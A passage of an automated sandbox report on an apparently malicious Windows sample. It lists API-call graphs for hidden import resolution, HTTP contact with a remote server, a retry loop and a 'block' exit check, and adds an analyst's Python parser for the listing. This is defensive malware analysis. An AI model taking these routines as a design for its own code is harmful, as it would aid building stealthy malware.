                          • 655 92a67d-92a684 -> 656, 657
                          • 656 92a686-92a699 GetProcAddress -> 657
                          • 657 92a69e-92a6a5 -> 658, 659
                          • 658 92a6a7-92a703 GetProcAddress * 4 -> 659
                          • 659 92a708-92a709 (no successors)
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01035730), ref: 00929C2D
                          • GetProcAddress.KERNEL32(74DD0000,01035910), ref: 00929C45
                          • GetProcAddress.KERNEL32(74DD0000,0104A858), ref: 00929C5E
                          • GetProcAddress.KERNEL32(74DD0000,0104A7F8), ref: 00929C76
                          • GetProcAddress.KERNEL32(74DD0000,0104A828), ref: 00929C8E
                          • GetProcAddress.KERNEL32(74DD0000,0104A840), ref: 00929CA7
                          • GetProcAddress.KERNEL32(74DD0000,0103CD10), ref: 00929CBF
                          • GetProcAddress.KERNEL32(74DD0000,0104EE78), ref: 00929CD7
                          • GetProcAddress.KERNEL32(74DD0000,0104F070), ref: 00929CF0
                          • GetProcAddress.KERNEL32(74DD0000,0104EDD0), ref: 00929D08
                          • GetProcAddress.KERNEL32(74DD0000,0104EFF8), ref: 00929D20
                          • GetProcAddress.KERNEL32(74DD0000,010357D0), ref: 00929D39
                          • GetProcAddress.KERNEL32(74DD0000,01035750), ref: 00929D51
                          • GetProcAddress.KERNEL32(74DD0000,01035930), ref: 00929D69
                          • GetProcAddress.KERNEL32(74DD0000,010356F0), ref: 00929D82
                          • GetProcAddress.KERNEL32(74DD0000,0104F088), ref: 00929D9A
                          • GetProcAddress.KERNEL32(74DD0000,0104EE00), ref: 00929DB2
                          • GetProcAddress.KERNEL32(74DD0000,0103CD88), ref: 00929DCB
                          • GetProcAddress.KERNEL32(74DD0000,01035950), ref: 00929DE3
                          • GetProcAddress.KERNEL32(74DD0000,0104F010), ref: 00929DFB
                          • GetProcAddress.KERNEL32(74DD0000,0104EE90), ref: 00929E14
                          • GetProcAddress.KERNEL32(74DD0000,0104F0A0), ref: 00929E2C
                          • GetProcAddress.KERNEL32(74DD0000,0104EFB0), ref: 00929E44
                          • GetProcAddress.KERNEL32(74DD0000,010359B0), ref: 00929E5D
                          • GetProcAddress.KERNEL32(74DD0000,0104F028), ref: 00929E75
                          • GetProcAddress.KERNEL32(74DD0000,0104EF80), ref: 00929E8D
                          • GetProcAddress.KERNEL32(74DD0000,0104F058), ref: 00929EA6
                          • GetProcAddress.KERNEL32(74DD0000,0104EEA8), ref: 00929EBE
                          • GetProcAddress.KERNEL32(74DD0000,0104EED8), ref: 00929ED6
                          • GetProcAddress.KERNEL32(74DD0000,0104EDB8), ref: 00929EEF
                          • GetProcAddress.KERNEL32(74DD0000,0104EEF0), ref: 00929F07
                          • GetProcAddress.KERNEL32(74DD0000,0104EFC8), ref: 00929F1F
                          • GetProcAddress.KERNEL32(74DD0000,0104EFE0), ref: 00929F38
                          • GetProcAddress.KERNEL32(74DD0000,0104B340), ref: 00929F50
                          • GetProcAddress.KERNEL32(74DD0000,0104F040), ref: 00929F68
                          • GetProcAddress.KERNEL32(74DD0000,0104EDE8), ref: 00929F81
                          • GetProcAddress.KERNEL32(74DD0000,010359D0), ref: 00929F99
                          • GetProcAddress.KERNEL32(74DD0000,0104EE18), ref: 00929FB1
                          • GetProcAddress.KERNEL32(74DD0000,01035690), ref: 00929FCA
                          • GetProcAddress.KERNEL32(74DD0000,0104EE30), ref: 00929FE2
                          • GetProcAddress.KERNEL32(74DD0000,0104EE60), ref: 00929FFA
                          • GetProcAddress.KERNEL32(74DD0000,010356B0), ref: 0092A013
                          • GetProcAddress.KERNEL32(74DD0000,01035B50), ref: 0092A02B
                          • LoadLibraryA.KERNEL32(0104EE48,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A03D
                          • LoadLibraryA.KERNEL32(0104EF20,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A04E
                          • LoadLibraryA.KERNEL32(0104EEC0,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A060
                          • LoadLibraryA.KERNEL32(0104EF08,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A072
                          • LoadLibraryA.KERNEL32(0104EF38,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A083
                          • LoadLibraryA.KERNEL32(0104EF50,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A095
                          • LoadLibraryA.KERNEL32(0104EF68,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0A7
                          • LoadLibraryA.KERNEL32(0104EF98,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0B8
                          • GetProcAddress.KERNEL32(75290000,01035D30), ref: 0092A0DA
                          • GetProcAddress.KERNEL32(75290000,0104F118), ref: 0092A0F2
                          • GetProcAddress.KERNEL32(75290000,01049F58), ref: 0092A10A
                          • GetProcAddress.KERNEL32(75290000,0104F358), ref: 0092A123
                          • GetProcAddress.KERNEL32(75290000,01035C30), ref: 0092A13B
                          • GetProcAddress.KERNEL32(734C0000,0103C900), ref: 0092A160
                          • GetProcAddress.KERNEL32(734C0000,01035D50), ref: 0092A179
                          • GetProcAddress.KERNEL32(734C0000,0103C608), ref: 0092A191
                          • GetProcAddress.KERNEL32(734C0000,0104F250), ref: 0092A1A9
                          • GetProcAddress.KERNEL32(734C0000,0104F1C0), ref: 0092A1C2
                          • GetProcAddress.KERNEL32(734C0000,01035C10), ref: 0092A1DA
                          • GetProcAddress.KERNEL32(734C0000,01035A90), ref: 0092A1F2
                          • GetProcAddress.KERNEL32(734C0000,0104F2E0), ref: 0092A20B
                          • GetProcAddress.KERNEL32(752C0000,01035D70), ref: 0092A22C
                          • GetProcAddress.KERNEL32(752C0000,01035DD0), ref: 0092A244
                          • GetProcAddress.KERNEL32(752C0000,0104F208), ref: 0092A25D
                          • GetProcAddress.KERNEL32(752C0000,0104F280), ref: 0092A275
                          • GetProcAddress.KERNEL32(752C0000,01035AB0), ref: 0092A28D
                          • GetProcAddress.KERNEL32(74EC0000,0103C7E8), ref: 0092A2B3
                          • GetProcAddress.KERNEL32(74EC0000,0103C6A8), ref: 0092A2CB
                          • GetProcAddress.KERNEL32(74EC0000,0104F298), ref: 0092A2E3
                          • GetProcAddress.KERNEL32(74EC0000,01035D90), ref: 0092A2FC
                          • GetProcAddress.KERNEL32(74EC0000,01035C50), ref: 0092A314
                          • GetProcAddress.KERNEL32(74EC0000,0103C950), ref: 0092A32C
                          • GetProcAddress.KERNEL32(75BD0000,0104F340), ref: 0092A352
                          • GetProcAddress.KERNEL32(75BD0000,01035AD0), ref: 0092A36A
                          • GetProcAddress.KERNEL32(75BD0000,01049F68), ref: 0092A382
                          • GetProcAddress.KERNEL32(75BD0000,0104F238), ref: 0092A39B
                          • GetProcAddress.KERNEL32(75BD0000,0104F268), ref: 0092A3B3
                          • GetProcAddress.KERNEL32(75BD0000,01035B70), ref: 0092A3CB
                          • GetProcAddress.KERNEL32(75BD0000,01035BD0), ref: 0092A3E4
                          • GetProcAddress.KERNEL32(75BD0000,0104F310), ref: 0092A3FC
                          • GetProcAddress.KERNEL32(75BD0000,0104F178), ref: 0092A414
                          • GetProcAddress.KERNEL32(75A70000,01035C90), ref: 0092A436
                          • GetProcAddress.KERNEL32(75A70000,0104F100), ref: 0092A44E
                          • GetProcAddress.KERNEL32(75A70000,0104F190), ref: 0092A466
                          • GetProcAddress.KERNEL32(75A70000,0104F148), ref: 0092A47F
                          • GetProcAddress.KERNEL32(75A70000,0104F370), ref: 0092A497
                          • GetProcAddress.KERNEL32(75450000,01035E10), ref: 0092A4B8
                          • GetProcAddress.KERNEL32(75450000,01035CF0), ref: 0092A4D1
                          • GetProcAddress.KERNEL32(75DA0000,01035DB0), ref: 0092A4F2
                          • GetProcAddress.KERNEL32(75DA0000,0104F130), ref: 0092A50A
                          • GetProcAddress.KERNEL32(6F060000,01035DF0), ref: 0092A530
                          • GetProcAddress.KERNEL32(6F060000,01035E30), ref: 0092A548
                          • GetProcAddress.KERNEL32(6F060000,01035AF0), ref: 0092A560
                          • GetProcAddress.KERNEL32(6F060000,0104F2B0), ref: 0092A579
                          • GetProcAddress.KERNEL32(6F060000,01035B90), ref: 0092A591
                          • GetProcAddress.KERNEL32(6F060000,01035C70), ref: 0092A5A9
                          • GetProcAddress.KERNEL32(6F060000,01035CB0), ref: 0092A5C2
                          • GetProcAddress.KERNEL32(6F060000,01035CD0), ref: 0092A5DA
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0092A5F1
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0092A607
                          • GetProcAddress.KERNEL32(75AF0000,0104F1D8), ref: 0092A629
                          • GetProcAddress.KERNEL32(75AF0000,0104A088), ref: 0092A641
                          • GetProcAddress.KERNEL32(75AF0000,0104F2C8), ref: 0092A659
                          • GetProcAddress.KERNEL32(75AF0000,0104F160), ref: 0092A672
                          • GetProcAddress.KERNEL32(75D90000,01035B10), ref: 0092A693
                          • GetProcAddress.KERNEL32(6CFD0000,0104F220), ref: 0092A6B4
                          • GetProcAddress.KERNEL32(6CFD0000,01035B30), ref: 0092A6CD
                          • GetProcAddress.KERNEL32(6CFD0000,0104F1A8), ref: 0092A6E5
                          • GetProcAddress.KERNEL32(6CFD0000,0104F388), ref: 0092A6FD
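The listing above is the sample's import-resolution routine. It makes 43 GetProcAddress calls against handle 74DD0000 before this routine loads any library, then 8 LoadLibraryA calls, then bursts of 1 to 10 GetProcAddress calls against 12 further handles; in the graph every burst hangs off a two-way branch, consistent with a check that the handle is non-NULL before it is used. Thirteen distinct handles are used but only eight libraries are loaded here, so at least five handles were obtained elsewhere (the report separately flags PEB reading, the usual way a loader locates kernel32 without an import). For 102 of the 104 GetProcAddress calls the export name is printed as a pointer into the 0103xxxx/0104xxxx range rather than as text, so the record does not say which exports are resolved; only InternetSetOptionA and HttpQueryInfoA are readable, which identifies handle 6F060000 as wininet.dll. The example below is added here and is not part of the report: it parses lines of this form and derives those counts. It ships with a subset of the lines above as constructed input; pasting the full list gives the totals for the whole routine. The regex and function names are mine.

```python
"""Summarise a Joe Sandbox GetProcAddress/LoadLibraryA listing: which module
handles the resolver uses, how many exports it pulls from each, which export
names the sandbox could read, and whether resolution starts before the routine's
first LoadLibraryA (added example; not part of the report)."""
import re
from collections import OrderedDict

# One '• Api.MODULE(arg,arg,...), ref: ADDR' line as Joe Sandbox prints it.
LINE_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# A name argument the sandbox printed as an 8-digit pointer instead of text.
POINTER_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Subset of the lines from the record above (constructed input for this example;
# paste the full list from the report to get totals for the whole routine).
RESOLVER_SUBSET = """
• GetProcAddress.KERNEL32(74DD0000,01035730), ref: 00929C2D
• GetProcAddress.KERNEL32(74DD0000,01035910), ref: 00929C45
• GetProcAddress.KERNEL32(74DD0000,01035B50), ref: 0092A02B
• LoadLibraryA.KERNEL32(0104EE48,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A03D
• LoadLibraryA.KERNEL32(0104EF98,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0B8
• GetProcAddress.KERNEL32(75290000,01035D30), ref: 0092A0DA
• GetProcAddress.KERNEL32(6F060000,01035DF0), ref: 0092A530
• GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0092A5F1
• GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0092A607
• GetProcAddress.KERNEL32(6CFD0000,0104F388), ref: 0092A6FD
"""

def parse_api_lines(text):
    """Return [(api, [arg, ...], ref_address)] for every API line in text."""
    rows = []
    for m in LINE_RE.finditer(text):
        args = [a.strip() for a in m.group("args").split(",")]
        rows.append((m.group("api"), args, int(m.group("ref"), 16)))
    return rows

def summarize_resolver(text):
    """Count GetProcAddress calls per module handle and relate them to LoadLibraryA."""
    per_handle = OrderedDict()   # module handle -> number of GetProcAddress calls
    readable = {}                # export name -> handle, where the log shows the name as text
    pointer_names = 0            # name arguments shown only as a pointer
    loadlib_calls = 0
    first_gpa = first_ll = None
    for api, args, ref in parse_api_lines(text):
        if api == "GetProcAddress":
            handle, name = args[0], args[1]
            per_handle[handle] = per_handle.get(handle, 0) + 1
            if name == "?" or POINTER_RE.match(name):
                pointer_names += 1
            else:
                readable[name] = handle
            first_gpa = ref if first_gpa is None else min(first_gpa, ref)
        elif api == "LoadLibraryA":
            loadlib_calls += 1
            first_ll = ref if first_ll is None else min(first_ll, ref)
    return {
        "per_handle": per_handle,
        "readable_names": readable,
        "pointer_name_count": pointer_names,
        "loadlibrary_calls": loadlib_calls,
        # lower bound on handles this routine did not obtain via LoadLibraryA
        "handles_not_from_loadlibrary": max(0, len(per_handle) - loadlib_calls),
        "resolves_before_first_loadlibrary": (
            first_gpa is not None and first_ll is not None and first_gpa < first_ll
        ),
    }

if __name__ == "__main__":
    for key, value in summarize_resolver(RESOLVER_SUBSET).items():
        print(f"{key}: {value}")
```

On the full listing the same function reports 104 GetProcAddress calls over 13 handles, 8 LoadLibraryA calls, 2 readable names and resolution starting at 0x929C2D, before the first LoadLibraryA at 0x92A03D. A handle that receives GetProcAddress calls but never came from LoadLibraryA in the same routine is the thing to chase next in the report: look for the PEB walk or an earlier LoadLibrary that produced it.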
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: the same 14 memory dumps as listed in the first record above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                          • Instruction ID: e2b858503f906f26305b8b19afc1d2b9bb76853b5df5ebbe271c0f710587cd77
                          • Opcode Fuzzy Hash: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                          • Instruction Fuzzy Hash: E16219B5510300AFD344DFA8ED98B663BF9F74C603B14879AA709E3264DE39A841DB13

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 916280-91630b call 92a7a0 call 9147b0 call 92a740 InternetOpenA StrCmpCA 1040 916314-916318 1033->1040 1041 91630d 1033->1041 1042 916509-916525 call 92a7a0 call 92a800 * 2 1040->1042 1043 91631e-916342 InternetConnectA 1040->1043 1041->1040 1061 916528-91652d 1042->1061 1044 916348-91634c 1043->1044 1045 9164ff-916503 InternetCloseHandle 1043->1045 1047 91635a 1044->1047 1048 91634e-916358 1044->1048 1045->1042 1050 916364-916392 HttpOpenRequestA 1047->1050 1048->1050 1053 9164f5-9164f9 InternetCloseHandle 1050->1053 1054 916398-91639c 1050->1054 1053->1045 1056 9163c5-916405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 91639e-9163bf InternetSetOptionA 1054->1057 1059 916407-916427 call 92a740 call 92a800 * 2 1056->1059 1060 91642c-91644b call 928940 1056->1060 1057->1056 1059->1061 1066 9164c9-9164e9 call 92a740 call 92a800 * 2 1060->1066 1067 91644d-916454 1060->1067 1066->1061 1071 9164c7-9164ef InternetCloseHandle 1067->1071 1072 916456-916480 InternetReadFile 1067->1072 1071->1053 1076 916482-916489 1072->1076 1077 91648b 1072->1077 1076->1077 1080 91648d-9164c5 call 92a9b0 call 92a8a0 call 92a800 1076->1080 1077->1071 1080->1072
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 00916303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                          • HttpOpenRequestA.WININET(00000000,GET,?,010500C8,00000000,00000000,00400100,00000000), ref: 00916385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009163FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0091646D
                          • InternetCloseHandle.WININET(00000000), ref: 009164EF
                          • InternetCloseHandle.WININET(00000000), ref: 009164F9
                          • InternetCloseHandle.WININET(00000000), ref: 00916503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                          • Instruction ID: 99a27a562cf7d962d8201b428589f20fe9ce1602b79b55104f824987cf9c4c86
                          • Opcode Fuzzy Hash: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                          • Instruction Fuzzy Hash: A1713C71E00318ABDB24DFA0DC59BEEB778BB48701F108598F50AAB1D4DBB46A85CF51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 925510-925577 call 925ad0 call 92a820 * 3 call 92a740 * 4 1106 92557c-925583 1090->1106 1107 9255d7-92564c call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1106->1107 1108 925585-9255b6 call 92a820 call 92a7a0 call 911590 call 9251f0 1106->1108 1133 925693-9256a9 call 92aad0 StrCmpCA 1107->1133 1137 92564e-92568e call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1107->1137 1124 9255bb-9255d2 call 92a8a0 call 92a800 1108->1124 1124->1133 1140 9256af-9256b6 1133->1140 1141 9257dc-925844 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1133->1141 1137->1133 1144 9257da-92585f call 92aad0 StrCmpCA 1140->1144 1145 9256bc-9256c3 1140->1145 1272 925ac3-925ac6 1141->1272 1165 925991-9259f9 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1144->1165 1166 925865-92586c 1144->1166 1146 9256c5-925719 call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1145->1146 1147 92571e-925793 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1145->1147 1146->1144 1147->1144 1250 925795-9257d5 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1147->1250 1165->1272 1167 925872-925879 1166->1167 1168 92598f-925a14 call 92aad0 StrCmpCA 1166->1168 1174 9258d3-925948 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1167->1174 1175 92587b-9258ce call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1167->1175 1197 925a16-925a21 Sleep 1168->1197 1198 925a28-925a91 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1168->1198 1174->1168 1276 92594a-92598a call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1144 1276->1168
                          APIs
                            • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                            • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009256A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925857
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 009252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
                            • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 0092532F
                            • Part of subcall function 009252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
                            • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 00925383
                            • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 009253AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0092578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00925A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                          • Instruction ID: 68a9b22095710ad11ab00d269c7d971b0b49afc19c9919ba15954a839c274328
                          • Opcode Fuzzy Hash: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                          • Instruction Fuzzy Hash: 9DE11072910218ABCB14FBA0FC56FED733DAF94300F508568F5066719AEF346A49CB96

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 9217a0-9217cd call 92aad0 StrCmpCA 1304 9217d7-9217f1 call 92aad0 1301->1304 1305 9217cf-9217d1 ExitProcess 1301->1305 1309 9217f4-9217f8 1304->1309 1310 9219c2-9219cd call 92a800 1309->1310 1311 9217fe-921811 1309->1311 1313 921817-92181a 1311->1313 1314 92199e-9219bd 1311->1314 1316 921932-921943 StrCmpCA 1313->1316 1317 921913-921924 StrCmpCA 1313->1317 1318 921970-921981 StrCmpCA 1313->1318 1319 9218f1-921902 StrCmpCA 1313->1319 1320 921951-921962 StrCmpCA 1313->1320 1321 921835-921844 call 92a820 1313->1321 1322 92187f-921890 StrCmpCA 1313->1322 1323 92185d-92186e StrCmpCA 1313->1323 1324 921821-921830 call 92a820 1313->1324 1325 921849-921858 call 92a820 1313->1325 1326 9218cf-9218e0 StrCmpCA 1313->1326 1327 92198f-921999 call 92a820 1313->1327 1328 9218ad-9218be StrCmpCA 1313->1328 1314->1309 1335 921945-921948 1316->1335 1336 92194f 1316->1336 1333 921930 1317->1333 1334 921926-921929 1317->1334 1340 921983-921986 1318->1340 1341 92198d 1318->1341 1331 921904-921907 1319->1331 1332 92190e 1319->1332 1337 921964-921967 1320->1337 1338 92196e 1320->1338 1321->1314 1348 921892-92189c 1322->1348 1349 92189e-9218a1 1322->1349 1346 921870-921873 1323->1346 1347 92187a 1323->1347 1324->1314 1325->1314 1329 9218e2-9218e5 1326->1329 1330 9218ec 1326->1330 1327->1314 1350 9218c0-9218c3 1328->1350 1351 9218ca 1328->1351 1329->1330 1330->1314 1331->1332 1332->1314 1333->1314 1334->1333 1335->1336 1336->1314 1337->1338 1338->1314 1340->1341 1341->1314 1346->1347 1347->1314 1355 9218a8 1348->1355 1349->1355 1350->1351 1351->1314 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 009217C5
                          • ExitProcess.KERNEL32 ref: 009217D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: e257b7fa2b8794081521078ef03a0df23ee604560df507cfaef85444adae8a02
                          • Instruction ID: 406f5666de3074c059dd73f1acec10997fc42eca3861da86192e26ef061d63c2
